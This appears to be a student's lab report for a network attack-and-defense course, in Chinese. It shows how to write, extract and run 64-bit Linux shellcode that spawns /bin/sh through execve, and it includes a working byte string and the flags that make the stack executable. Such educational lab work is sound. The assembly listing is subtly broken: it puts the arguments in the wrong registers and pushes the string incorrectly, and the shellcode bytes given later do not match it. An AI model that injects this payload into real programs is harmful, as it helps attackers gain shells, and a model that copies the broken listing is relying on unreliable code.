2019-2020-2 20175310奚晨妍《网络对抗技术》Exp1+ 逆向进阶

目录

• 1 Task1
  • 1.1 用C语言编写代码
  • 1.2 编译代码并查看反汇编结果
  • 1.3 编写shellcode
  • 1.4 提取shellcode
  • 1.5 编写测试代码
• 2 参考资料

1 Task1

shellcode就是一段机器指令（code）

• 通常这段机器指令的目的是为获取一个交互式的shell（像linux的shell或类似windows下的cmd.exe）
• 所以这段机器指令被称为shellcode。
• 在实际的应用中，凡是用来注入的机器指令段都通称为shellcode,功能可以是添加一个用户、运行一条指令等。

Shellcode有以下几点要求

• 调用系统函数获取shell权限
• Shellcode里面不能出现\x00

1.1 用C语言编写代码

在Linux里，有两种方法创建新进程：

• 一是通过现有的进程来创建，并替换正在活动的；
• 二是利用现有的进程来生成它自己的拷贝，并在它的位置运行这个新进程。

而execve()系统调用就可以在现有的进程空间里执行其他的进程。

因此这里选择通过C语言调用execve()来返回shell。

我们先在终端中输入man execve了解一下这个函数的用法：

从图中可以看出execve()需要三个参数：

• filename必须指向包含要执行的二进制文件的路径的字符串。在这个例子中就是/bin/sh。
• argv []是程序的参数列表。大多数程序将使用强制性/选项参数运行。而我们只想执行/bin/sh，而没有任何更多的参数，所以参数列表只是一个NULL指针。但是按照惯例，第一个参数是我们要执行的文件名，所以argv []就是"/bin/sh",NULL。
• envp []是要以key：value格式传递给程序的任何其他环境选项的列表。为了我们的目的，这将是NULL指针\x00000000。

由此我们可以编写C代码：

#include <unistd.h>
#include <stdlib.h>
char *buf[]={"/bin/sh",NULL};
void main()
{
  execve("/bin/sh",buf,0);
  exit(0);
}

1.2 编译代码并查看反汇编结果

对上述代码进行静态编译，此时执行可以看到返回了shell。

输入objdump -d test | more进行反汇编。

可以发现execve()就相当于执行syscall，然后调用0x3b调用号，0x3b对应十进制的59，也就是execve()的调用号。

1.3 编写shellcode

• shellcode应该尽量地简洁紧凑，这样才能注入更小的缓冲区
  • 当遇到n字节长的缓冲区时，不仅要把整个shellcode复制到缓冲区，还要加上调用shellcode的指令，所以shellcode必须比n小。
• Shellcode里面不能出现\x00
  • shellcode中如果存在一些NULL（\x00）字符，当我们把shellcode复制到缓冲区时，有时候会出现异常（因为字符数组用null做终止符）。

section .text 
global _start 
_start: 
xor rax,rax ;将rax置为0
push rax ;将全0入栈
 
push 0x68732f 
push 0x6e69622f ;在堆栈中反向压入“/bin/sh”，即“hs/nib/”
 
mov rbx,rsp ;用rsp将rbx指向“/bin/sh”

push rax ;将全0入栈
mov rdx,rsp ;将rsp指向rdx

push rbx ;将“/bin/sh”地址入栈
mov rcx,rsp ;让rcx指向地址
 
mov eax,0xffffffc5 ;
neg eax ;将0x3b赋值给eax             
 
syscall 

输入nasm -f elf64 shellcode_test.asm和ld -o shellcode_test shellcode_test.o编译汇编文件，输入objdump -d shellcode_test进行反汇编

1.4 提取shellcode

上图中红框里就是我们需要的机器码，可以自己手动输入，或是使用下面这段代码直接生成

objdump -d ./shellcode_test|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

1.5 编写测试代码

调用shellcode其实有很多种方法，这里我用了一种最简单的，其他方法可以参考这篇博客。

#include <stdio.h>

int main()
{
          char shellcode[] = "\x48\x31\xd2\x48\x31\xf6\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x50\x48\x89\xe7\xb8\xc5\xff\xff\xff\xf7\xd8\x0f\x05";
           ((void(*)(void))&shellcode)(); 
}

编译好代码后，一定要设置堆栈可执行，不然成功不了，这里有两种方法：

• 输入execstack -s code，设置堆栈可执行后再运行。

• 通过编译时加上-z execstack设置堆栈可执行。

这时候，我们自己编写的64位shellcode就已经运行成功了。

2 参考资料

Linux下shellcode的编写

20155213免考项目——bof进阶及简易的HIDAttack

shellcode指导

【干货分享】手把手简易实现shellcode及详解

C语言执行shellcode的五种方法